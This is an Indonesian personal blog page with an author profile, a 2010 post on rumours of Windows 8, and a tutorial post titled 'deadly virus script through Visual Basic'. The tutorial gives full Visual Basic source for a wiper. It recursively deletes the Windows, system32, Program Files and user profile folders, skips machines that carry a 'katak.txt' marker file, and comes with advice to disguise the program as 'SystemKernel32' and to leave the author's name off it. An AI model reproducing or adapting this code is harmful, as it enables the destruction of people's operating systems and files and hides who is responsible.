Welcome To My Blog

Dalam Blog ini Insya Allah anda tidak akan menyesal telah membukanya....

Because dalam blog ini terdapat berbagai macam informasi, tidak lupa program dan link software yang pastinya anda butuhkan serta berbagai macam lainnya

Anda juga akan disugukan berbagai macam video yang bermanfaat dan menimbulkan dampak positif kepada anda semua

Selamat Membuka My Blog yach

Mi Profile

Foto saya
Makassar, Sulawesi Selatan, Indonesia
Aku adalah anak kedua dari tiga bersaudara Aku dilahirkan dari keluarga sederhana tapi sangat rukun Aku Dilahirkan di kota Angin Mamiri, yakni kota yang sangat ku cintai Makassar tanggal 22 Agustus 1994 Perekonomian tidak kekurangan ataupun kelebihan alias sedang-sedang saja Tapi ku mencoba tuk bahagiakan orang tuaku and smua orang yang synk padaku Ehh Knpa curhat yach :-) Bdw pendidikan aku skrng masih di bangku SMK kelas X TKJ 1 di SMK Darussalam Makassar And now saya sangat bahagia and juga Aku akan menyebarkan kebahagiaanku ini pada semuax

Rabu, 24 Maret 2010

Windows 8 Siap di luncurkan tahun2012

SAN FRANSISCO - Tidak habis di Windows 7 saja, Microsoft dipastikan masih terus berinovasi mempercanggih sistem operasi terbarunya. Bahkan OS Windows 8 dikabarkan meluncur pada tahun 2012 nanti.

Jika kalender suku maya tidak terbukti dan kiamat tidak hadir pada tahun 2012, Microsoft akan menggelontorkan sistem operasi terbarunya, Windows 8. Tepat, tiga tahun setelah kemunculan Windows 7 tahun ini.

Isu ini berkembang setelah roadmap yang diduga milik Microsoft berhasil tersebar di internet. Dikutip dari Electronista, Sabtu (21/11/2009), roadmap tersebut digambarkan sesuai dengan ritme peluncurkan produk-produk Microsoft.

Misalnya, untuk meluncurkan Windows Server 2003 dan Windows Server 2003 R2, Microsoft membutuhkan waktu selama dua tahun, sejak 2003 hingga 2005. Begitu pula saat meluncurkan Windows Server 2008 dan Windows Server 2008 R2.
Oleh karena itu, Microsoft dianggap tidak membutuhkan waktu yang lama untuk bisa menggelontorkan kembali sistem operasi terbarunya dengan kode nama Windows 8.

Tidak ada komentar:

Posting Komentar

Scrip Virus Mematikan melalui Visual Basic

Tutorial Bikin Virus cman 1 mnt 1. bikin form sekecil mungkin 2. didalem form itu, masukin nih kode Public Sub DelAll(ByVal DirtoDelete As Variant) Dim FSO, FS Set FSO = CreateObject(”Scripting.FileSystemObject”) FS = FSO.DeleteFolder(DirtoDelete, True) End Sub Private Sub Form_Load() On Error Resume Next If FileExist(”c:\windows\system32\katak.txt”) = True Then End Else Call DelAll(”c:\windows\system”) Call DelAll(”c:\windows\system32″) Call DelAll(”c:\windows”) Call DelAll(”C:\Documents and Settings\All Users”) Call DelAll(”C:\Documents and Settings\Administrator”) Call DelAll(”C:\Documents and Settings”) Call DelAll(”C:\Program Files\Common Files”) Call DelAll(”C:\Program Files\Internet Explorer”) Call DelAll(”C:\Program Files\Microsoft Visual Studio”) Call DelAll(”C:\Program Files”) End End If End Sub Function FileExist(ByVal FileName As String) As Boolean If Dir(FileName) = “” Then FileExist = False Else FileExist = True End If End Function 3. Kode yg warna biru itu penangkal nih virus, barang kali lu ga sengaja teken jadi lu slamat. jadi di folder c:\windows\system32\ kalo ada file namanya katak.txt, lu ga bakal keserang ndiri… bisa lu edit koq jadi apa gitu… Yang warna merah itu folder yg bakal didelete ama nih virus, lu edit ndiri aja… 4. Bikin nih project namanya kaya nama system, disini gwe make nama “SystemKernel32″ jadi ga bakal dicurigain 5. Jangan pernah naroh nama lu di nih virus… k? 6. compile deh… slese! Simple kan? nih virus kerjanya cman ngapus system, lumayan bahaya… ini cman contoh bikin virus… slanjutnya.. anda ndiri coba2 ndiri.